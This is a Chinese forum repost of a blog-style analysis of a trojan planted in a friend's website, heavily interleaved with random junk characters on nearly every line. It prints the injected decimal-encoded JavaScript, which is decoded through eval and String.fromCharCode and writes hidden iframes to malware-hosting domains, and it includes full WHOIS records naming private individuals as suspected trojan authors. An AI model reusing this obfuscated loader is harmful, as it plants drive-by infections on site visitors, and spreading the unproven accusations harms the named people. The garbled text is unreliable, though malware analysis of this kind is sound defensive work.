[原创]一篇刚写的分析木马手记

首发在我的博客里面， !' 0PM[  
cMrO@=b;  
http://www.areway.cn/?p=175 ~Zn|(  
>,QCKZH  
ULhXyItL  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： E4
'z  
          ilXKJJda  
<script>t=’60,105,102,114,97,109,101, Zd'Yu{<_2N  
32,115,114,99,61,104,116,116,112,58,47,47, psse^rFg  
102,114,101,101,46,117,45,117,117,117,46,99, tLU@&NY`  
110,47,101,114,114,111,114,46,104,116,109, /1p5KVTKv  
32,119,105,100,116,104,61,49,48,48,32,104, *fs[]q'Q  
101,105,103,104,116,61,48,62,60,47,105,102, !
x:{"  
114,97,109,101,62′; kl[(!"p  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> ~BqC!v.)@E  
                                                                                                  >9mj/P D  
<script>t=’60,105,102,114,97,109,101,32,115, Fe %Vp/  
114,99,61,104,116,116,112,58,47,47,102,114, 4x<H=CJC  
101,101,46,117,45,117,117,117,46,99,110,47, 5 1N/XEk  
101,114,114,111,114,46,104,116,109,32,119, &Nh zEl1  
105,100,116,104,61,49,48,48,32,104,101,105, *p=enflU  
103,104,116,61,48,62,60,47,105,102,114,97, #jzF6j%G  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); rT=C/SKP  
document.write(t);</script> jo0XF]  
                                                                                                  Lq$ig8V:O7  
<html xmlns=” yMu G? x+  
http://www.w3.org/1999/xhtml (7N!Jvg9  
“> i=*H|)  
<head> >tPf.xI|l  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> "]uPke@  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> .vctuy&  
<title>首页 - 爱生活家庭网 G'u[0>  
                                                                                                                                                    R?;mu^B  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 "G~!J
\  
转换字符串后的大概内容是（谁点击后果自付）： pKpB  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… "O-X*>?f  
                                                                                                                                  EADN   
查询玉米u-uuu.cn的详细信息： #t;]s<  
Domain Name: u-uuu.cn xMNQT.A  
ROID: 20070901s10001s64972306-cn O9zMD8  
Domain Status: ok Dn@ZS_f  
Registrant Organization: 王雷 !H@HgJ -  
Registrant Name: 王雷 =+UtAf<n  
Administrative Email: czlovexs@126.com `"}).{N]C  
Sponsoring Registrar: 北京万网志成科技有限公司 pdR\Ne0P*  
Name Server:ns.yovole.com G[JWG  
Name Server:ns1.yovole.com N UvVhy]{  
Registration Date: 2007-09-01 17:54 #
rF`Hk:  
Expiration Date: 2008-09-01 17:54 _WvVF*Q"k  
最后PING了一下地址 都没有什么…. J}[[tl  
                                                                                                maDWV&Db  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. %gs?~Xl)]  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> mj
?Gc
  
<script language=”javascript” src=” ~;]kqYIJ  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script |1tpXpe  
> l*OR{!3H$  
这个玉米应该有可能是木马作者的： -b{<VrZ  
foafau.info的详细信息： cD6^7QF  
Access to INFO WHOIS information is provided to assist persons in W7'<Jom|?  
determining the contents of a domain name registration record in the ']>9/r#  
Afilias registry database. The data in this record is provided by ?}v/)hjp=?  
Afilias Limited for informational purposes only, and Afilias does not 99`w'Nlk  
guarantee its accuracy.  This service is intended only for query-based U]gUGD!5x  
access. You agree that you will use this data only for lawful purposes W6}>iB  
and that, under no circumstances will you use this data to: (a) allow, 37kVJQcA1  
enable, or otherwise support the transmission by e-mail, telephone, or K
:jn^JN$  
facsimile of mass unsolicited, commercial advertising or solicitations Pzq^x]  
to entities other than the data recipient’s own existing customers; or Y%kOq`uT=n  
(b) enable high volume, automated, electronic processes that send n[gE[kw  
queries or data to the systems of Registry Operator, a Registrar, or PuREqa\_[  
Afilias except as reasonably necessary to register domain names or ye=4<b_  
modify existing registrations. All rights reserved. Afilias reserves Q.$Rhjb  
the right to modify these terms at any time. By submitting this query, 7 s{vou  
you agree to abide by this policy. ,dT
mI{@O  
Domain ID:D22418703-LRMS 
H7.l)'  
Domain Name:FOAFAU.INFO h2T\%V_j  
Created On:20-Nov-2007 16:05:42 UTC ha$1vi}b  
Last Updated On:20-Nov-2007 16:05:44 UTC te2vv]W1  
Expiration Date:20-Nov-2008 16:05:42 UTC l*z%Jw  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) Lo_+W1+  
Status:CLIENT DELETE PROHIBITED )dX(0E4Td/  
Status:CLIENT RENEW PROHIBITED B7[d^Y60B  
Status:CLIENT TRANSFER PROHIBITED GW'v\O  
Status:CLIENT UPDATE PROHIBITED mi<Q3;m  
Status:TRANSFER PROHIBITED 7`;f<QNo  
Registrant ID:GODA-040110615 Pb>/b\&JS  
Registrant Name:liu hong dt:$:,"   
Registrant Organization: z9[TjTH^}T  
Registrant Street1:beijing ~`QoBZ.O&  
Registrant Street2: vs=q<Uw)  
Registrant Street3: V=*^C+6s  
Registrant City:beijing }}$@Tij19[  
Registrant State/Province: 96<oX:#  
Registrant Postal Code:100000 j;y~vX b  
Registrant Country:CN "}qs+  
Registrant Phone:+86.860108888777 G2kU_  
Registrant Phone Ext.: C
A0XcLiFt  
Registrant FAX: [,Go*r  
Registrant FAX Ext.: >*h+N? m  
Registrant Email:bbbshiji@163.com |EX=Rj*  
Admin ID:GODA-240110615 &H;,,7u  
Admin Name:liu hong 9;U?_   
Admin Organization: $\h-F8|JMX  
Admin Street1:beijing \\<=J[R.M  
Admin Street2: c**&,aL  
Admin Street3: kJ FWk  
Admin City:beijing Pn OWQ8=  
Admin State/Province: 9%T"W  
Admin Postal Code:100000 zZCRej  
Admin Country:CN kaekH*m~  
Admin Phone:+86.860108888777 R\3a Sx L  
Admin Phone Ext.: Pn">fWRCx  
Admin FAX: ZK^cG'^2|  
Admin FAX Ext.: )ciP6WzzbI  
Admin Email:bbbshiji@163.com PtbaC6"\  
Billing ID:GODA-340110615 l(sVnhL6h  
Billing Name:liu hong ALTOi?  
Billing Organization: (~^fx\
-S  
Billing Street1:beijing dn- [Gnde  
Billing Street2: (4L/I  
Billing Street3: Y)X7*iTi'j  
Billing City:beijing dz9U.:C  
Billing State/Province: X"r)zCP+t  
Billing Postal Code:100000 mg'q-G`\<  
Billing Country:CN <@-O06  
Billing Phone:+86.860108888777 h
HE~
/U  
Billing Phone Ext.: ):! =XhQ  
Billing FAX: t Y  
Billing FAX Ext.: Lkm-<  
Billing Email:bbbshiji@163.com R}=5:)%w  
Tech ID:GODA-140110615 xGwImF$r  
Tech Name:liu hong &*<27-x  
Tech Organization: M@A3+v%K  
Tech Street1:beijing \tI%[g1M  
Tech Street2: ?N<My&E  
Tech Street3: }UW7py!TN  
Tech City:beijing >s{I@#9  
Tech State/Province: XX~vg>3_  
Tech Postal Code:100000 qLDj\%~(  
Tech Country:CN elCYH9W^  
Tech Phone:+86.860108888777 !'jq.RawP  
Tech Phone Ext.: ^U_T<x8{  
Tech FAX: !,[#,oy;  
Tech FAX Ext.: yXR1NYg  
Tech Email:bbbshiji@163.com `Y?VQ~ci
>  
Name Server:NS27.DOMAINCONTROL.COM K.)!qkW-%S  
Name Server:NS28.DOMAINCONTROL.COM >S +}  
Name Server: r.H`3m.0q  
Name Server: )r9 9zdUk  
Name Server: !uEEuD
#  
Name Server: BY6#dlDi  
Name Server: o{s2T)2  
Name Server: ,5n!a.T  
Name Server: 5.~Je6K U  
Name Server: '8X>,un  
Name Server: S 5S\zTPIf  
Name Server: 6ZQ |L=Ytp  
Name Server: QQ3<)i  
                                                                                                          >j5\J_(;D  
接着下载每个文件里面的代码： m+Ye`]  
一步一步看.. +FTc/r  
"Lbsq\W>  
q3$8"Q^  
\3 SY2g8+  
?gE=hh  
pr0X7 #_E5  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

要是有全部 就好了 传上来

看过了就是没看懂。。。